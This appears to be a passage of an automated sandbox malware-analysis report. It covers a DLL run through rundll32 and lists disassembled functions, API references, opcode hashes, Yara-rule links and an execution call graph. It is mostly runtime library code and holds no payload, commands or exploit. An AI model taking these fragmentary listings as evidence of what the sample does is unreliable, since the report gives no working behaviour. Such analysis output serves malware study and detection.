                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
                          • Instruction ID: b608b0b885ca7fd519d03412d6d71d138d0ca4d3c501e79feaf1a421cc3c9c77
                          • Opcode Fuzzy Hash: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
                          • Instruction Fuzzy Hash: C601FC3236563B9BCB514BA98D4CD5777EBBF167A1B240624F905D3344DB21D821C6F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2114EC, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2114F3
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211528
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E211539
                            • Part of subcall function 6E210110: __EH_prolog3.LIBCMT ref: 6E210117
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21154A
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
                          • Instruction ID: 2e32ef2f549774a53d890ce118931582242e0feea91c09fbe127c2a04df80d54
                          • Opcode Fuzzy Hash: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
                          • Instruction Fuzzy Hash: 8701D674A0021F9FD701CBE8C851BDE7BBAAF10744F100416E615BB240EB704B85C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E211558, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21155F
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211594
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E2115A5
                            • Part of subcall function 6E210143: __EH_prolog3.LIBCMT ref: 6E21014A
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E2115B6
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
                          • Instruction ID: 8e155efdcd922922af3e2e2a8304fb80cc0c8c159035ca2b258a3c26daefa17d
                          • Opcode Fuzzy Hash: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
                          • Instruction Fuzzy Hash: C501D1B4A0421FAFDB20CBE4C860BDEBBBAAF14744F100515EA15AB280CBB04B85C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21C229, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21C230
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E21C265
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E21C276
                            • Part of subcall function 6E21BD9F: __EH_prolog3.LIBCMT ref: 6E21BDA6
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21C287
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
                          • Instruction ID: d7d19c46935fcf2b72b34e4d060d71294fd56aa4c7bf56b0b49adc697a4a4342
                          • Opcode Fuzzy Hash: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
                          • Instruction Fuzzy Hash: B5016D79A0421EDBDB45DFE4C851ADEBBFAAF44B85F100525E614AB280CBB04B41C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1E18A0, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E1E18A7
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1E18D5
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • ctype.LIBCPMT ref: 6E1E18E7
                            • Part of subcall function 6E1E1928: __Getctype.LIBCPMT ref: 6E1E1937
                            • Part of subcall function 6E1E1928: __Getcvt.LIBCPMT ref: 6E1E1949
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1E18F1
                            • Part of subcall function 6E1E14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1E14F5
                            • Part of subcall function 6E1E14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1566
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
                          • String ID:
                          • API String ID: 1262428101-0
                          • Opcode ID: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
                          • Instruction ID: 3dff2b7836515da84c69f6901c1163d2e3d80ca426f2cef45d09b40a278377ee
                          • Opcode Fuzzy Hash: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
                          • Instruction Fuzzy Hash: 61F09AB5A00B0DDFEB10DFD0C411BDDB7AAAF00B19F204818F2195B680DBB456C4DA80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20B968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6E20B96F
                            • Part of subcall function 6E20A2F1: __EH_prolog3.LIBCMT ref: 6E20A2F8
                            • Part of subcall function 6E20A2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
                            • Part of subcall function 6E20A2F1: int.LIBCPMT ref: 6E20A319
                            • Part of subcall function 6E20A2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
                          • _Find_unchecked1.LIBCPMT ref: 6E20BB80
                          Strings
                          • 0123456789ABCDEFabcdef-+Xx, xrefs: 6E20B9D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
                          • String ID: 0123456789ABCDEFabcdef-+Xx
                          • API String ID: 1853221402-2799312399
                          • Opcode ID: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
                          • Instruction ID: 9058b79f0aed7c49f61ba439b98479c1ba6c938a87b63f456b38d7e56f044c7b
                          • Opcode Fuzzy Hash: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
                          • Instruction Fuzzy Hash: A6C19E34D1828E8FDF62CBE8C490BDCBBB7AF45304F1444A9D8966B2CECB649945CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2460ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 6E24617D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
                          • Instruction ID: c41f90c39b4b520227d771ef12d26310ff06030748f0458a2c9aae07ff911396
                          • Opcode Fuzzy Hash: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
                          • Instruction Fuzzy Hash: DE51ACE1AB810FD7DB456BE4CB9075A3BA7EB01B02F20CD5CD095823DDEB3184A4DA52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E25DE50,?,00000050,?,?,?,?,?), ref: 6E25DC8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ACP$OCP
                          • API String ID: 0-711371036
                          • Opcode ID: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
                          • Instruction ID: 765538ebe0c3eaa7bb62265b682247ad23f188a8fce3eedb0c41bb3cc0437e93
                          • Opcode Fuzzy Hash: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
                          • Instruction Fuzzy Hash: AE21C466A6410FA7E754CFD8CB00B8B73ABAB45B53F528424E90AD7308E772D961CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21FAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Tn,n$`n,n
                          • API String ID: 0-3894424707
                          • Opcode ID: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
                          • Instruction ID: 0fd38b8e3836c9714727457c7d25762572ff14ae64ee4c53b92351e2029f33ae
                          • Opcode Fuzzy Hash: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
                          • Instruction Fuzzy Hash: FD11B276C1461E9BEF80CEE8C454ADF77E79F0AB25F104166D921EB280D6B0C7018BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2059F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Deallocate
                          • String ID: :B n$[json.exception.
                          • API String ID: 1075933841-3849622167
                          • Opcode ID: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
                          • Instruction ID: 218fd96fd83dae967e78c502c145d0d31e2c87026cedc3ff35e28bf0706639ee
                          • Opcode Fuzzy Hash: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
                          • Instruction Fuzzy Hash: E50108765042195F8314CF58DCC0C4BB7DEEE892147100A6DF429C7341EB31E90587A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E203751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6E203758
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2037E2
                          Strings
                          • 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E2037BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8H_prolog3_Throw
                          • String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
                          • API String ID: 2985221223-1287915644
                          • Opcode ID: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
                          • Instruction ID: c772e41be5f7b2f332d735131a26b9f89d4a247c623edb0674636bff832eaf76
                          • Opcode Fuzzy Hash: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
                          • Instruction Fuzzy Hash: 9A0180B586860DAFD7129FE5C848FECB3FBBF26316F10891A9080960E0EB741685C752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E22ACC2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: NameName::
                          • String ID: {flat}
                          • API String ID: 1333004437-2606204563
                          • Opcode ID: 20290364ece1e1cbb91cb890aa88b473a91aaf8831a6c58441f14078b04c4573
                          • Instruction ID: e2929e0fea4fb7d1dbe7123e5c8dd8a1e3615297f5ea365430a2fc005af8d266
                          • Opcode Fuzzy Hash: 20290364ece1e1cbb91cb890aa88b473a91aaf8831a6c58441f14078b04c4573
                          • Instruction Fuzzy Hash: 35F065B418024D9FDB01CF94D4A9BE93BE6AB01726F04C455E80D4F691C7B5D980C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E254B79, Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,D1FE2DEA,D1FE2DEA,00000000,00000000,00000000,00000000,00000000), ref: 6E254C0F
                          • GetLastError.KERNEL32 ref: 6E254C1D
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E254C78
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          • Opcode ID: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
                          • Instruction ID: 8775ab3d8009a28f0ed7ee8adb2f68d99103e5b50beb331d8458cda2a1d64c2a
                          • Opcode Fuzzy Hash: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
                          • Instruction Fuzzy Hash: 3E41F77560424FAFDB518FD5C944BAAB7BAAF81322F104159E857AB390DB318932CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 4604 Parent PID: 1084 rundll32.exeCOMMON

                          Execution Graph

                          Execution Coverage:3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:373
                          Total number of Limit Nodes:15

                          Graph

                          execution_graph 26509 6e21ae21 LCMapStringW __Towlower 26601 6e206c21 40 API calls std::_System_error_category::default_error_condition 26602 6e20c821 80 API calls 26603 6e209821 SetLastError 26606 6e201c2c GetModuleHandleA GetModuleFileNameA 26096 6e207833 26099 6e2078d3 26096->26099 26098 6e207842 26100 6e2078df __EH_prolog3 26099->26100 26105 6e21f8b6 26100->26105 26104 6e207900 numpunct 26104->26098 26108 6e21f8bb 26105->26108 26107 6e2078ee 26107->26104 26113 6e207005 26107->26113 26108->26107 26110 6e21f8d7 numpunct 26108->26110 26125 6e2423d2 26108->26125 26132 6e249256 7 API calls 2 library calls 26108->26132 26133 6e223d74 RaiseException 26110->26133 26112 6e220603 26114 6e207011 __EH_prolog3 26113->26114 26136 6e206653 26114->26136 26119 6e20702f 26148 6e2071c4 26119->26148 26120 6e20708d numpunct 26120->26104 26124 6e20704d 26153 6e2066ba LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 26124->26153 26130 6e24f26d std::_Locinfo::_W_Getdays 26125->26130 26126 6e24f2ab 26135 6e242281 20 API calls __dosmaperr 26126->26135 26128 6e24f296 RtlAllocateHeap 26129 6e24f2a9 26128->26129 26128->26130 26129->26108 26130->26126 26130->26128 26134 6e249256 7 API calls 2 library calls 26130->26134 26132->26108 26133->26112 26134->26130 26135->26129 26137 6e206662 26136->26137 26138 6e206669 26136->26138 26154 6e2423c0 EnterCriticalSection _Atexit 26137->26154 26140 6e206667 26138->26140 26155 6e209339 EnterCriticalSection 26138->26155 26140->26124 26142 6e2071a1 26140->26142 26143 6e21f8b6 numpunct 22 API calls 26142->26143 26145 6e2071ac 26143->26145 26144 6e2071c0 26144->26119 26145->26144 26156 6e206e05 21 API calls _Yarn 26145->26156 26147 6e2071be 26147->26119 26149 6e2071d0 26148->26149 26151 6e207037 26148->26151 26157 6e20db5a 26149->26157 26152 6e206f34 21 API calls 2 library calls 26151->26152 26152->26124 26153->26120 26154->26140 26155->26140 26156->26147 26158 6e20db6a RtlEncodePointer 26157->26158 26165 6e2462da 26157->26165 26158->26151 26161 6e246314 IsProcessorFeaturePresent 26161->26165 26164 6e2463c1 26164->26151 26165->26151 26165->26161 26165->26164 26166 6e257c4f EnterCriticalSection LeaveCriticalSection _Atexit 26165->26166 26167 6e257cb3 38 API calls 5 library calls 26165->26167 26168 6e241f6d 8 API calls 2 library calls 26165->26168 26169 6e249779 28 API calls _Atexit 26165->26169 26166->26165 26167->26165 26168->26165 26169->26165 26609 6e25d804 41 API calls 4 library calls 26610 6e207c02 68 API calls std::ios_base::_Ios_base_dtor 26512 6e209a14 GetSystemTimeAsFileTime 26515 6e202262 86 API calls 2 library calls 26617 6e225860 5 API calls 2 library calls 26618 6e201c64 29 API calls 3 library calls 26183 6e24f26d 26184 6e24f2ab 26183->26184 26189 6e24f27b std::_Locinfo::_W_Getdays 26183->26189 26191 6e242281 20 API calls __dosmaperr 26184->26191 26186 6e24f296 RtlAllocateHeap 26187 6e24f2a9 26186->26187 26186->26189 26189->26184 26189->26186 26190 6e249256 7 API calls 2 library calls 26189->26190 26190->26189 26191->26187 26518 6e20766e 43 API calls 26622 6e210041 40 API calls _Mpunct 26520 6e208643 43 API calls _Ungetc 26625 6e20844a 77 API calls std::locale::_Locimp::_Makeushloc 26526 6e21fa4c 20 API calls ___scrt_release_startup_lock 26091 6e220052 26092 6e220060 dllmain_dispatch 26091->26092 26093 6e22005b 26091->26093 26095 6e220a3d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 26093->26095 26095->26092 26628 6e21fca2 29 API calls _at_quick_exit 26530 6e1e1a9a 22 API calls ctype 26535 6e1e1e8e 28 API calls std::ios_base::_Init 26537 6e207281 27 API calls std::bad_exception::bad_exception 26635 6e220483 5 API calls ___raise_securityfailure 26170 6e21fe86 103 API calls 4 library calls 26542 6e20d693 47 API calls __Tolower 26638 6e208499 81 API calls 2 library calls 26544 6e20dae0 22 API calls std::_Stodx_v2 26641 6e20d0e1 84 API calls 2 library calls 26642 6e2080ec 42 API calls std::ios_base::_Init 26551 6e20daf7 DecodePointer 26644 6e2098fd TlsFree 26645 6e2208c1 GetStartupInfoW ___scrt_fastfail 26647 6e2098d3 TlsAlloc 26552 6e209322 InitializeCriticalSectionAndSpinCount ___crtInitializeCriticalSectionEx 26653 6e209927 TlsGetValue 26171 6e21fd29 26172 6e21fd34 26171->26172 26173 6e21fd67 dllmain_crt_process_detach 26171->26173 26174 6e21fd59 dllmain_crt_process_attach 26172->26174 26175 6e21fd39 26172->26175 26180 6e21fd43 26173->26180 26174->26180 26176 6e21fd4f 26175->26176 26177 6e21fd3e 26175->26177 26182 6e21fa20 29 API calls 26176->26182 26177->26180 26181 6e21fa3f 27 API calls 26177->26181 26181->26180 26182->26180 26654 6e20852d 67 API calls 2 library calls 26553 6e20872e 65 API calls fpos 26557 6e20e73d 40 API calls 4 library calls 26560 6e20e705 39 API calls 3 library calls 26561 6e20670c EnterCriticalSection std::_Lockit::_Lockit 26562 6e21b70c 45 API calls 5 library calls 26564 6e21b715 43 API calls 4 library calls 26565 6e209314 DeleteCriticalSection 26192 6e21ff18 26194 6e21ff24 CallCatchBlock 26192->26194 26193 6e21ff33 26194->26193 26195 6e21ff4d dllmain_raw 26194->26195 26196 6e21ff48 26194->26196 26195->26193 26197 6e21ff67 dllmain_crt_dispatch 26195->26197 26205 6e201285 26196->26205 26197->26193 26197->26196 26199 6e21ff88 26200 6e21ffb4 26199->26200 26203 6e201285 83 API calls 26199->26203 26200->26193 26201 6e21ffbd dllmain_crt_dispatch 26200->26201 26201->26193 26202 6e21ffd0 dllmain_raw 26201->26202 26202->26193 26204 6e21ffa0 dllmain_crt_dispatch dllmain_raw 26203->26204 26204->26200 26206 6e201291 __EH_prolog3 __Stoullx 26205->26206 26207 6e2013aa GetSystemDirectoryA 26206->26207 26208 6e201401 __Stoullx 26207->26208 26209 6e201459 GetTempPathA 26208->26209 26210 6e20147c 26209->26210 26239 6e205dab 26210->26239 26216 6e2014f7 26269 6e204267 26216->26269 26218 6e20159b 26277 6e2020d9 26218->26277 26220 6e2015a2 